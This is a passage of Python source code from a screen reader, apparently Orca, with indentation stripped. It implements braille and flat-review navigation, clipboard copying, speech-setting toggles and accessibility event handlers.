In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to character
associated with cell 0."""
self.panBrailleRight(inputEvent, 1)
def goBrailleHome(self, inputEvent=None):
"""Returns to the component with focus."""
if self.flatReviewContext:
return self.toggleFlatReviewMode(inputEvent)
else:
return braille.returnToRegionWithFocus(inputEvent)
def setContractedBraille(self, inputEvent=None):
"""Toggles contracted braille."""
self._setContractedBraille(inputEvent)
return True
def processRoutingKey(self, inputEvent=None):
"""Processes a cursor routing key."""
braille.processRoutingKey(inputEvent)
return True
def processBrailleCutBegin(self, inputEvent=None):
"""Clears the selection and moves the caret offset in the currently
active text area.
"""
obj, caretOffset = self.getBrailleCaretContext(inputEvent)
if caretOffset >= 0:
self.utilities.clearTextSelection(obj)
self.utilities.setCaretOffset(obj, caretOffset)
return True
def processBrailleCutLine(self, inputEvent=None):
"""Extends the text selection in the currently active text
area and also copies the selected text to the system clipboard."""
obj, caretOffset = self.getBrailleCaretContext(inputEvent)
if caretOffset >= 0:
self.utilities.adjustTextSelection(obj, caretOffset)
texti = obj.queryText()
startOffset, endOffset = texti.getSelection(0)
string = texti.getText(startOffset, endOffset)
clipboard = Gtk.Clipboard.get(Gdk.Atom.intern("CLIPBOARD", False))
clipboard.set_text(string, len(string))
return True
def routePointerToItem(self, inputEvent=None):
"""Moves the mouse pointer to the current item."""
# Store the original location for scripts which want to restore
# it later.
#
self.oldMouseCoordinates = self.utilities.absoluteMouseCoordinates()
self.lastMouseRoutingTime = time.time()
if self.flatReviewContext:
self.flatReviewContext.routeToCurrent()
else:
try:
eventsynthesizer.routeToCharacter(orca_state.locusOfFocus)
except:
try:
eventsynthesizer.routeToObject(orca_state.locusOfFocus)
except:
full = messages.LOCATION_NOT_FOUND_FULL
brief = messages.LOCATION_NOT_FOUND_BRIEF
self.presentMessage(full, brief)
return True
def presentStatusBar(self, inputEvent):
"""Speaks and brailles the contents of the status bar and/or default
button of the window with focus.
"""
obj = orca_state.locusOfFocus
self.updateBraille(obj)
voice = self.voices[settings.DEFAULT_VOICE]
frame, dialog = self.utilities.frameAndDialog(obj)
if frame:
# In windows with lots of objects (Thunderbird, Firefox, etc.)
# If we wait until we've checked for both the status bar and
# a default button, there may be a noticable delay. Therefore,
# speak the status bar info immediately and then go looking
# for a default button.
#
msg = self.speechGenerator.generateStatusBar(frame)
if msg:
self.presentMessage(msg, voice=voice)
window = dialog or frame
if window:
msg = self.speechGenerator.generateDefaultButton(window)
if msg:
self.presentMessage(msg, voice=voice)
def presentTitle(self, inputEvent):
"""Speaks and brailles the title of the window with focus."""
title = self.speechGenerator.generateTitle(orca_state.locusOfFocus)
for (string, voice) in title:
self.presentMessage(string, voice=voice)
def readCharAttributes(self, inputEvent=None):
"""Reads the attributes associated with the current text character.
Calls outCharAttributes to speak a list of attributes. By default,
a certain set of attributes will be spoken. If this is not desired,
then individual application scripts should override this method to
only speak the subset required.
"""
attrs, start, end = self.utilities.textAttributes(orca_state.locusOfFocus, None, True)
# Get a dictionary of text attributes that the user cares about.
[userAttrList, userAttrDict] = self.utilities.stringToKeysAndDict(
_settingsManager.getSetting('enabledSpokenTextAttributes'))
# Because some implementors make up their own attribute names,
# we need to convert.
userAttrList = list(map(self.utilities.getAppNameForAttribute, userAttrList))
nullValues = ['0', '0mm', 'none', 'false']
for key in userAttrList:
value = attrs.get(key)
ignoreIfValue = userAttrDict.get(key)
if value in nullValues and ignoreIfValue in nullValues:
continue
if value and value != ignoreIfValue:
self.speakMessage(self.utilities.localizeTextAttribute(key, value))
return True
def leftClickReviewItem(self, inputEvent=None):
"""Performs a left mouse button click on the current item."""
if self.flatReviewContext:
self.flatReviewContext.clickCurrent(1)
else:
try:
eventsynthesizer.clickCharacter(orca_state.locusOfFocus, 1)
except:
try:
eventsynthesizer.clickObject(orca_state.locusOfFocus, 1)
except:
self.speakMessage(messages.LOCATION_NOT_FOUND_FULL)
return True
def rightClickReviewItem(self, inputEvent=None):
"""Performs a right mouse button click on the current item."""
if self.flatReviewContext:
self.flatReviewContext.clickCurrent(3)
else:
try:
eventsynthesizer.clickCharacter(orca_state.locusOfFocus, 3)
except:
try:
eventsynthesizer.clickObject(orca_state.locusOfFocus, 3)
except:
full = messages.LOCATION_NOT_FOUND_FULL
brief = messages.LOCATION_NOT_FOUND_BRIEF
self.presentMessage(full, brief)
return True
def spellCurrentItem(self, itemString):
"""Spell the current flat review word or line.
Arguments:
- itemString: the string to spell.
"""
for character in itemString:
self.speakCharacter(character)
def _reviewCurrentItem(self, inputEvent, targetCursorCell=0,
speechType=1):
"""Presents the current item to the user.
Arguments:
- inputEvent - the current input event.
- targetCursorCell - if non-zero, the target braille cursor cell.
- speechType - the desired presentation: speak (1), spell (2), or
phonetic (3).
"""
context = self.getFlatReviewContext()
[wordString, x, y, width, height] = \
context.getCurrent(flat_review.Context.WORD)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
if (not wordString) \
or (not len(wordString)) \
or (wordString == "\n"):
speech.speak(messages.BLANK)
else:
[lineString, x, y, width, height] = \
context.getCurrent(flat_review.Context.LINE)
if lineString == "\n":
speech.speak(messages.BLANK)
elif wordString.isspace():
speech.speak(messages.WHITE_SPACE)
elif wordString.isupper() and speechType == 1:
speech.speak(wordString,
self.voices[settings.UPPERCASE_VOICE])
elif speechType == 2:
self.spellCurrentItem(wordString)
elif speechType == 3:
self.phoneticSpellCurrentItem(wordString)
elif speechType == 1:
wordString = self.utilities.adjustForRepeats(wordString)
speech.speak(wordString)
self.updateBrailleReview(targetCursorCell)
self.currentReviewContents = wordString
return True
def reviewCurrentAccessible(self, inputEvent):
context = self.getFlatReviewContext()
[zoneString, x, y, width, height] = \
context.getCurrent(flat_review.Context.ZONE)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
utterances = self.speechGenerator.generateSpeech(
context.getCurrentAccessible())
utterances.extend(self.tutorialGenerator.getTutorial(
context.getCurrentAccessible(), False))
speech.speak(utterances)
return True
def reviewPreviousItem(self, inputEvent):
"""Moves the flat review context to the previous item. Places
the flat review cursor at the beginning of the item."""
context = self.getFlatReviewContext()
moved = context.goPrevious(flat_review.Context.WORD,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewNextItem(self, inputEvent):
"""Moves the flat review context to the next item. Places
the flat review cursor at the beginning of the item."""
context = self.getFlatReviewContext()
moved = context.goNext(flat_review.Context.WORD,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewCurrentCharacter(self, inputEvent):
"""Brailles and speaks the current flat review character."""
self._reviewCurrentCharacter(inputEvent, 1)
return True
def reviewSpellCurrentCharacter(self, inputEvent):
"""Brailles and 'spells' (phonetically) the current flat review
character.
"""
self._reviewCurrentCharacter(inputEvent, 2)
return True
def reviewUnicodeCurrentCharacter(self, inputEvent):
"""Brailles and speaks unicode information about the current flat
review character.
"""
self._reviewCurrentCharacter(inputEvent, 3)
return True
def _reviewCurrentCharacter(self, inputEvent, speechType=1):
"""Presents the current flat review character via braille and speech.
Arguments:
- inputEvent - the current input event.
- speechType - the desired presentation:
speak (1),
phonetic (2)
unicode value information (3)
"""
context = self.getFlatReviewContext()
[charString, x, y, width, height] = \
context.getCurrent(flat_review.Context.CHAR)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
if (not charString) or (not len(charString)):
speech.speak(messages.BLANK)
else:
[lineString, x, y, width, height] = \
context.getCurrent(flat_review.Context.LINE)
if lineString == "\n" and speechType != 3:
speech.speak(messages.BLANK)
elif speechType == 3:
self.speakUnicodeCharacter(charString)
elif speechType == 2:
self.phoneticSpellCurrentItem(charString)
else:
self.speakCharacter(charString)
self.updateBrailleReview()
self.currentReviewContents = charString
return True
def reviewPreviousCharacter(self, inputEvent):
"""Moves the flat review context to the previous character. Places
the flat review cursor at character."""
context = self.getFlatReviewContext()
moved = context.goPrevious(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentCharacter(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewEndOfLine(self, inputEvent):
"""Moves the flat review context to the end of the line. Places
the flat review cursor at the end of the line."""
context = self.getFlatReviewContext()
context.goEnd(flat_review.Context.LINE)
self.reviewCurrentCharacter(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewNextCharacter(self, inputEvent):
"""Moves the flat review context to the next character. Places
the flat review cursor at character."""
context = self.getFlatReviewContext()
moved = context.goNext(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentCharacter(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewAbove(self, inputEvent):
"""Moves the flat review context to the character most directly
above the current flat review cursor. Places the flat review
cursor at character."""
context = self.getFlatReviewContext()
moved = context.goAbove(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent, self.targetCursorCell)
return True
def reviewBelow(self, inputEvent):
"""Moves the flat review context to the character most directly
below the current flat review cursor. Places the flat review
cursor at character."""
context = self.getFlatReviewContext()
moved = context.goBelow(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent, self.targetCursorCell)
return True
def reviewCurrentLine(self, inputEvent):
"""Brailles and speaks the current flat review line."""
self._reviewCurrentLine(inputEvent, 1)
return True
def reviewSpellCurrentLine(self, inputEvent):
"""Brailles and spells the current flat review line."""
self._reviewCurrentLine(inputEvent, 2)
return True
def reviewPhoneticCurrentLine(self, inputEvent):
"""Brailles and phonetically spells the current flat review line."""
self._reviewCurrentLine(inputEvent, 3)
return True
def _reviewCurrentLine(self, inputEvent, speechType=1):
"""Presents the current flat review line via braille and speech.
Arguments:
- inputEvent - the current input event.
- speechType - the desired presentation: speak (1), spell (2), or
phonetic (3)
"""
context = self.getFlatReviewContext()
[lineString, x, y, width, height] = \
context.getCurrent(flat_review.Context.LINE)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
if (not lineString) \
or (not len(lineString)) \
or (lineString == "\n"):
speech.speak(messages.BLANK)
elif lineString.isspace():
speech.speak(messages.WHITE_SPACE)
elif lineString.isupper() \
and (speechType < 2 or speechType > 3):
speech.speak(lineString, self.voices[settings.UPPERCASE_VOICE])
elif speechType == 2:
self.spellCurrentItem(lineString)
elif speechType == 3:
self.phoneticSpellCurrentItem(lineString)
else:
lineString = self.utilities.adjustForRepeats(lineString)
speech.speak(lineString)
self.updateBrailleReview()
self.currentReviewContents = lineString
return True
def reviewPreviousLine(self, inputEvent):
"""Moves the flat review context to the beginning of the
previous line."""
context = self.getFlatReviewContext()
moved = context.goPrevious(flat_review.Context.LINE,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewHome(self, inputEvent):
"""Moves the flat review context to the top left of the current
window."""
context = self.getFlatReviewContext()
context.goBegin()
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewNextLine(self, inputEvent):
"""Moves the flat review context to the beginning of the
next line. Places the flat review cursor at the beginning
of the line."""
context = self.getFlatReviewContext()
moved = context.goNext(flat_review.Context.LINE,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewBottomLeft(self, inputEvent):
"""Moves the flat review context to the beginning of the
last line in the window. Places the flat review cursor at
the beginning of the line."""
context = self.getFlatReviewContext()
context.goEnd(flat_review.Context.WINDOW)
context.goBegin(flat_review.Context.LINE)
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewEnd(self, inputEvent):
"""Moves the flat review context to the end of the
last line in the window. Places the flat review cursor
at the end of the line."""
context = self.getFlatReviewContext()
context.goEnd()
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewCurrentItem(self, inputEvent, targetCursorCell=0):
"""Brailles and speaks the current item to the user."""
self._reviewCurrentItem(inputEvent, targetCursorCell, 1)
return True
def reviewSpellCurrentItem(self, inputEvent, targetCursorCell=0):
"""Brailles and spells the current item to the user."""
self._reviewCurrentItem(inputEvent, targetCursorCell, 2)
return True
def reviewPhoneticCurrentItem(self, inputEvent, targetCursorCell=0):
"""Brailles and phonetically spells the current item to the user."""
self._reviewCurrentItem(inputEvent, targetCursorCell, 3)
return True
def flatReviewCopy(self, inputEvent):
"""Copies the contents of the item under flat review to and places
them in the clipboard."""
if self.flatReviewContext:
clipboard = Gtk.Clipboard.get(Gdk.Atom.intern("CLIPBOARD", False))
clipboard.set_text(
self.currentReviewContents, len(self.currentReviewContents))
self.presentMessage(messages.FLAT_REVIEW_COPIED)
else:
self.presentMessage(messages.FLAT_REVIEW_NOT_IN)
return True
def _appendToClipboard(self, clipboard, text, newText):
"""Appends newText to text and places the results in the
clipboard."""
text = text.rstrip("\n")
text = "%s\n%s" % (text, newText)
if clipboard:
clipboard.set_text(text, len(text))
return True
def flatReviewAppend(self, inputEvent):
"""Appends the contents of the item under flat review to
the clipboard."""
if self.flatReviewContext:
clipboard = Gtk.Clipboard.get(Gdk.Atom.intern("CLIPBOARD", False))
clipboard.request_text(
self._appendToClipboard, self.currentReviewContents)
self.presentMessage(messages.FLAT_REVIEW_APPENDED)
else:
self.presentMessage(messages.FLAT_REVIEW_NOT_IN)
return True
def sayAll(self, inputEvent, obj=None, offset=None):
try:
clickCount = inputEvent.getClickCount()
except:
clickCount = 1
doubleClick = clickCount == 2
if doubleClick:
# Try to "say all" for the current dialog/window by flat
# reviewing everything. See bug #354462 for more details.
#
context = self.getFlatReviewContext()
utterances = []
context.goBegin()
while True:
[wordString, x, y, width, height] = \
context.getCurrent(flat_review.Context.ZONE)
utterances.append(wordString)
moved = context.goNext(flat_review.Context.ZONE,
flat_review.Context.WRAP_LINE)
if not moved:
break
speech.speak(utterances)
return
obj = obj or orca_state.locusOfFocus
try:
text = obj.queryText()
except NotImplementedError:
utterances = self.speechGenerator.generateSpeech(obj)
utterances.extend(self.tutorialGenerator.getTutorial(obj, False))
speech.speak(utterances)
except AttributeError:
pass
else:
if offset == None:
offset = text.caretOffset
speech.sayAll(self.textLines(obj, offset),
self.__sayAllProgressCallback)
return True
def toggleFlatReviewMode(self, inputEvent=None):
"""Toggles between flat review mode and focus tracking mode."""
verbosity = _settingsManager.getSetting('speechVerbosityLevel')
if self.flatReviewContext:
if inputEvent and verbosity != settings.VERBOSITY_LEVEL_BRIEF:
self.presentMessage(messages.FLAT_REVIEW_STOP)
self.flatReviewContext = None
self.updateBraille(orca_state.locusOfFocus)
else:
if inputEvent and verbosity != settings.VERBOSITY_LEVEL_BRIEF:
self.presentMessage(messages.FLAT_REVIEW_START)
context = self.getFlatReviewContext()
[wordString, x, y, width, height] = \
context.getCurrent(flat_review.Context.WORD)
self._reviewCurrentItem(inputEvent, self.targetCursorCell)
return True
def toggleSilenceSpeech(self, inputEvent=None):
"""Toggle the silencing of speech.
Returns True to indicate the input event has been consumed.
"""
speech.stop()
if _settingsManager.getSetting('silenceSpeech'):
_settingsManager.setSetting('silenceSpeech', False)
self.presentMessage(messages.SPEECH_ENABLED)
elif not _settingsManager.getSetting('enableSpeech'):
_settingsManager.setSetting('enableSpeech', True)
speech.init()
self.presentMessage(messages.SPEECH_ENABLED)
else:
self.presentMessage(messages.SPEECH_DISABLED)
_settingsManager.setSetting('silenceSpeech', True)
return True
def toggleSpeechVerbosity(self, inputEvent=None):
"""Toggles speech verbosity level between verbose and brief."""
value = _settingsManager.getSetting('speechVerbosityLevel')
if value == settings.VERBOSITY_LEVEL_BRIEF:
self.presentMessage(messages.SPEECH_VERBOSITY_VERBOSE)
_settingsManager.setSetting(
'speechVerbosityLevel', settings.VERBOSITY_LEVEL_VERBOSE)
else:
self.presentMessage(messages.SPEECH_VERBOSITY_BRIEF)
_settingsManager.setSetting(
'speechVerbosityLevel', settings.VERBOSITY_LEVEL_BRIEF)
return True
def toggleSpeakingIndentationJustification(self, inputEvent=None):
"""Toggles the speaking of indentation and justification."""
value = _settingsManager.getSetting('enableSpeechIndentation')
_settingsManager.setSetting('enableSpeechIndentation', not value)
if _settingsManager.getSetting('enableSpeechIndentation'):
full = messages.INDENTATION_JUSTIFICATION_ON_FULL
brief = messages.INDENTATION_JUSTIFICATION_ON_BRIEF
else:
full = messages.INDENTATION_JUSTIFICATION_OFF_FULL
brief = messages.INDENTATION_JUSTIFICATION_OFF_BRIEF
self.presentMessage(full, brief)
return True
def cycleSpeakingPunctuationLevel(self, inputEvent=None):
""" Cycle through the punctuation levels for speech. """
currentLevel = _settingsManager.getSetting('verbalizePunctuationStyle')
if currentLevel == settings.PUNCTUATION_STYLE_NONE:
newLevel = settings.PUNCTUATION_STYLE_SOME
full = messages.PUNCTUATION_SOME_FULL
brief = messages.PUNCTUATION_SOME_BRIEF
elif currentLevel == settings.PUNCTUATION_STYLE_SOME:
newLevel = settings.PUNCTUATION_STYLE_MOST
full = messages.PUNCTUATION_MOST_FULL
brief = messages.PUNCTUATION_MOST_BRIEF
elif currentLevel == settings.PUNCTUATION_STYLE_MOST:
newLevel = settings.PUNCTUATION_STYLE_ALL
full = messages.PUNCTUATION_ALL_FULL
brief = messages.PUNCTUATION_ALL_BRIEF
else:
newLevel = settings.PUNCTUATION_STYLE_NONE
full = messages.PUNCTUATION_NONE_FULL
brief = messages.PUNCTUATION_NONE_BRIEF
_settingsManager.setSetting('verbalizePunctuationStyle', newLevel)
self.presentMessage(full, brief)
speech.updatePunctuationLevel()
return True
def cycleSettingsProfile(self, inputEvent=None):
"""Cycle through the user's existing settings profiles."""
profiles = _settingsManager.availableProfiles()
if not (profiles and profiles[0]):
self.presentMessage(messages.PROFILE_NOT_FOUND)
return True
isMatch = lambda x: x[1] == _settingsManager.getProfile()
current = list(filter(isMatch, profiles))[0]
try:
name, profileID = profiles[profiles.index(current) + 1]
except IndexError:
name, profileID = profiles[0]
_settingsManager.setProfile(profileID, updateLocale=True)
# TODO: The right fix is to go find each and every case where we use
# self.voices directly and instead get the voices from the Settings
# Manager. But that's too big a change too close to code freeze. So
# for now we'll hack.
self.voices = _settingsManager.getSetting('voices')
# TODO: This is another "too close to code freeze" hack to cause the
# command names to be presented in the correct language.
self.setupInputEventHandlers()
self.presentMessage(messages.PROFILE_CHANGED % name, name)
return True
def cycleCapitalizationStyle(self, inputEvent=None):
""" Cycle through the speech-dispatcher capitalization styles. """
currentStyle = _settingsManager.getSetting('capitalizationStyle')
if currentStyle == settings.CAPITALIZATION_STYLE_NONE:
newStyle = settings.CAPITALIZATION_STYLE_SPELL
full = messages.CAPITALIZATION_SPELL_FULL
brief = messages.CAPITALIZATION_SPELL_BRIEF
elif currentStyle == settings.CAPITALIZATION_STYLE_SPELL:
newStyle = settings.CAPITALIZATION_STYLE_ICON
full = messages.CAPITALIZATION_ICON_FULL
brief = messages.CAPITALIZATION_ICON_BRIEF
else:
newStyle = settings.CAPITALIZATION_STYLE_NONE
full = messages.CAPITALIZATION_NONE_FULL
brief = messages.CAPITALIZATION_NONE_BRIEF
_settingsManager.setSetting('capitalizationStyle', newStyle)
self.presentMessage(full, brief)
speech.updateCapitalizationStyle()
return True
def cycleKeyEcho(self, inputEvent=None):
(newKey, newWord, newSentence) = (False, False, False)
key = _settingsManager.getSetting('enableKeyEcho')
word = _settingsManager.getSetting('enableEchoByWord')
sentence = _settingsManager.getSetting('enableEchoBySentence')
if (key, word, sentence) == (False, False, False):
(newKey, newWord, newSentence) = (True, False, False)
full = messages.KEY_ECHO_KEY_FULL
brief = messages.KEY_ECHO_KEY_BRIEF
elif (key, word, sentence) == (True, False, False):
(newKey, newWord, newSentence) = (False, True, False)
full = messages.KEY_ECHO_WORD_FULL
brief = messages.KEY_ECHO_WORD_BRIEF
elif (key, word, sentence) == (False, True, False):
(newKey, newWord, newSentence) = (False, False, True)
full = messages.KEY_ECHO_SENTENCE_FULL
brief = messages.KEY_ECHO_SENTENCE_BRIEF
elif (key, word, sentence) == (False, False, True):
(newKey, newWord, newSentence) = (True, True, False)
full = messages.KEY_ECHO_KEY_AND_WORD_FULL
brief = messages.KEY_ECHO_KEY_AND_WORD_BRIEF
elif (key, word, sentence) == (True, True, False):
(newKey, newWord, newSentence) = (False, True, True)
full = messages.KEY_ECHO_WORD_AND_SENTENCE_FULL
brief = messages.KEY_ECHO_WORD_AND_SENTENCE_BRIEF
else:
(newKey, newWord, newSentence) = (False, False, False)
full = messages.KEY_ECHO_NONE_FULL
brief = messages.KEY_ECHO_NONE_BRIEF
_settingsManager.setSetting('enableKeyEcho', newKey)
_settingsManager.setSetting('enableEchoByWord', newWord)
_settingsManager.setSetting('enableEchoBySentence', newSentence)
self.presentMessage(full, brief)
return True
def toggleTableCellReadMode(self, inputEvent=None):
"""Toggles an indicator for whether we should just read the current
table cell or read the whole row."""
speakRow = _settingsManager.getSetting('readTableCellRow')
_settingsManager.setSetting('readTableCellRow', not speakRow)
if not speakRow:
line = messages.TABLE_MODE_ROW
else:
line = messages.TABLE_MODE_CELL
self.presentMessage(line)
return True
def doWhereAmI(self, inputEvent, basicOnly):
"""Peforms the whereAmI operation.
Arguments:
- inputEvent: The original inputEvent
"""
obj = orca_state.locusOfFocus
self.updateBraille(obj)
return self.whereAmI.whereAmI(obj, basicOnly)
def whereAmIBasic(self, inputEvent):
"""Speaks basic information about the current object of interest.
"""
self.doWhereAmI(inputEvent, True)
def whereAmIDetailed(self, inputEvent):
"""Speaks detailed/custom information about the current object of
interest.
"""
self.doWhereAmI(inputEvent, False)
def cycleDebugLevel(self, inputEvent=None):
levels = [debug.LEVEL_ALL, "all",
debug.LEVEL_FINEST, "finest",
debug.LEVEL_FINER, "finer",
debug.LEVEL_FINE, "fine",
debug.LEVEL_CONFIGURATION, "configuration",
debug.LEVEL_INFO, "info",
debug.LEVEL_WARNING, "warning",
debug.LEVEL_SEVERE, "severe",
debug.LEVEL_OFF, "off"]
try:
levelIndex = levels.index(debug.debugLevel) + 2
except:
levelIndex = 0
else:
if levelIndex >= len(levels):
levelIndex = 0
debug.debugLevel = levels[levelIndex]
briefMessage = levels[levelIndex + 1]
fullMessage = "Debug level %s." % briefMessage
self.presentMessage(fullMessage, briefMessage)
return True
########################################################################
# #
# AT-SPI OBJECT EVENT HANDLERS #
# #
########################################################################
def noOp(self, event):
"""Just here to capture events.
Arguments:
- event: the Event
"""
pass
def onActiveChanged(self, event):
"""Callback for object:state-changed:active accessibility events."""
if self.findCommandRun:
self.findCommandRun = False
self.find()
def onActiveDescendantChanged(self, event):
"""Callback for object:active-descendant-changed accessibility events."""
if not event.any_data:
return
if not event.source.getState().contains(pyatspi.STATE_FOCUSED) \
and not event.any_data.getState().contains(pyatspi.STATE_FOCUSED):
return
if self.stopSpeechOnActiveDescendantChanged(event):
speech.stop()
orca.setLocusOfFocus(event, event.any_data)
def onBusyChanged(self, event):
"""Callback for object:state-changed:busy accessibility events."""
pass
def onCheckedChanged(self, event):
"""Callback for object:state-changed:checked accessibility events."""
obj = event.source
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
state = obj.getState()
if state.contains(pyatspi.STATE_EXPANDABLE):
return
# Radio buttons normally change their state when you arrow to them,
# so we handle the announcement of their state changes in the focus
# handling code. However, we do need to handle radio buttons where
# the user needs to press the space key to select them.
if obj.getRole() == pyatspi.ROLE_RADIO_BUTTON:
eventString, mods = self.utilities.lastKeyAndModifiers()
if not eventString in [" ", "space"]:
return
oldObj, oldState = self.pointOfReference.get('checkedChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['checkedChange'] = hash(obj), event.detail1
def onChildrenChanged(self, event):
"""Called when a child node has changed.
Arguments:
- event: the Event
"""
pass
def onCaretMoved(self, event):
"""Called whenever the caret moves.
Arguments:
- event: the Event
"""
if not orca_state.locusOfFocus:
return
obj, offset = self.pointOfReference.get("lastCursorPosition", (None, -1))
if offset == event.detail1 \
and self.utilities.isSameObject(obj, event.source):
return
# Should the event source be the locusOfFocus?
#
try:
role = orca_state.locusOfFocus.getRole()
except (LookupError, RuntimeError):
role = None
if role in [pyatspi.ROLE_FRAME, pyatspi.ROLE_DIALOG]:
frameApp = orca_state.locusOfFocus.getApplication()
eventApp = event.source.getApplication()
if frameApp == eventApp \
and event.source.getState().contains(pyatspi.STATE_FOCUSED):
orca.setLocusOfFocus(event, event.source, False)
# Ignore caret movements from non-focused objects, unless the
# currently focused object is the parent of the object which
# has the caret.
#
if (event.source != orca_state.locusOfFocus) \
and (event.source.parent != orca_state.locusOfFocus):
return
# We always automatically go back to focus tracking mode when
# the caret moves in the focused object.
#
if self.flatReviewContext:
self.toggleFlatReviewMode()
text = event.source.queryText()
self._saveLastCursorPosition(event.source, text.caretOffset)
if text.getNSelections():
return
self._presentTextAtNewCaretPosition(event)
def onDocumentReload(self, event):
"""Callback for document:reload accessibility events."""
pass
def onDocumentLoadComplete(self, event):
"""Callback for document:load-complete accessibility events."""
pass
def onDocumentLoadStopped(self, event):
"""Callback for document:load-stopped accessibility events."""
pass
def onExpandedChanged(self, event):
"""Callback for object:state-changed:expanded accessibility events."""
obj = event.source
role = obj.getRole()
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus) \
and not role in [pyatspi.ROLE_TABLE_ROW, pyatspi.ROLE_COMBO_BOX]:
return
oldObj, oldState = self.pointOfReference.get('expandedChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['expandedChange'] = hash(obj), event.detail1
def onIndeterminateChanged(self, event):
"""Callback for object:state-changed:indeterminate accessibility events."""
# If this state is cleared, the new state will become checked or unchecked
# and we should get object:state-changed:checked events for those cases.
# Therefore, if the state is not now indeterminate/partially checked,
# ignore this event.
if not event.detail1:
return
obj = event.source
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
oldObj, oldState = self.pointOfReference.get('indeterminateChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['indeterminateChange'] = hash(obj), event.detail1
def onMouseButton(self, event):
"""Called whenever the user presses or releases a mouse button.
Arguments:
- event: the Event
"""
mouseEvent = input_event.MouseButtonEvent(event)
orca_state.lastInputEvent = mouseEvent
if mouseEvent.pressed:
speech.stop()
return
# If we've received a mouse button released event, then check if
# there are and text selections for the locus of focus and speak
# them.
#
obj = orca_state.locusOfFocus
try:
text = obj.queryText()
except:
return
self.updateBraille(orca_state.locusOfFocus)
textContents = self.utilities.allSelectedText(obj)[0]
if not textContents:
return
utterances = []
utterances.append(textContents)
utterances.append(messages.TEXT_SELECTED)
speech.speak(utterances)
def onNameChanged(self, event):
"""Callback for object:property-change:accessible-name events."""
obj = event.source
names = self.pointOfReference.get('names', {})
oldName = names.get(hash(obj))
if oldName == event.any_data:
return
# We are ignoring name changes in comboboxes that have focus
# see bgo#617204
role = obj.getRole()
if role == pyatspi.ROLE_COMBO_BOX:
return
# Table cell accessibles in trees are often reused. When this occurs,
# we get name-changed events when the selection changes.
if role == pyatspi.ROLE_TABLE_CELL:
return
# Normally, we only care about name changes in the current object.
# But with the new GtkHeaderBar, we are seeing instances where the
# real frame remains the same, but the functional frame changes
# e.g. g-c-c going from all settings to a specific panel.
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
if role != pyatspi.ROLE_FRAME \
or not obj.getState().contains(pyatspi.STATE_ACTIVE):
return
names[hash(obj)] = event.any_data
self.pointOfReference['names'] = names
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
def onPressedChanged(self, event):
"""Callback for object:state-changed:pressed accessibility events."""
obj = event.source
if not self.utilities.isSameObject(obj, orca_state.locusOfFocus):
return
oldObj, oldState = self.pointOfReference.get('pressedChange', (None, 0))
if hash(oldObj) == hash(obj) and oldState == event.detail1:
return
self.updateBraille(obj)
speech.speak(self.speechGenerator.generateSpeech(obj, alreadyFocused=True))
self.pointOfReference['pressedChange'] = hash(obj), event.detail1
def onSelectedChanged(self, event):
"""Callback for object:state-changed:selected accessibility events."""
obj = event.source
state = obj.getState()
if not state.contains(pyatspi.STATE_FOCUSED):
return
if not self.utilities.isSameObject(orca_state.locusOfFocus, obj):
return
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return
isSelected = state.contains(pyatspi.STATE_SELECTED)
announceState = False
keyString, mods = self.utilities.lastKeyAndModifiers()
if keyString == "space":
announceState = True
elif keyString in ["Down", "Up"] \
and isSelected and obj.getRole() == pyatspi.ROLE_TABLE_CELL:
announceState = True
if not announceState:
return
# TODO - JD: Unlike the other state-changed callbacks, it seems unwise
# to call generateSpeech() here because that also will present the
# expandable state if appropriate for the object type. The generators
# need to gain some smarts w.r.t. state changes.
voice = self.voices.get(settings.SYSTEM_VOICE)
if event.detail1:
speech.speak(messages.TEXT_SELECTED, voice, False)
else:
speech.speak(messages.TEXT_UNSELECTED, voice, False)
def onSelectionChanged(self, event):
"""Callback for object:selection-changed accessibility events."""
obj = event.source
